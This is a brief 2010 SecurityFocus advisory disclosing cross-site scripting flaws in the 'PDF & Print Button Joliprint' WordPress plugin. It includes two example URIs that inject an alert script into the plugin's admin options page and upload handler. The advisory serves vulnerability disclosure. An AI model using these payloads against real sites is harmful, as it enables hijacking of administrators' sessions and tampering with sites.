PDF & Print Button Joliprint Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/wp-admin/options-general.php?page=joliprint/joliprint_admin_options.php&opt=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://www.example.com/wp-content/plugins/joliprint/joliprint_options_upload.php?type=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus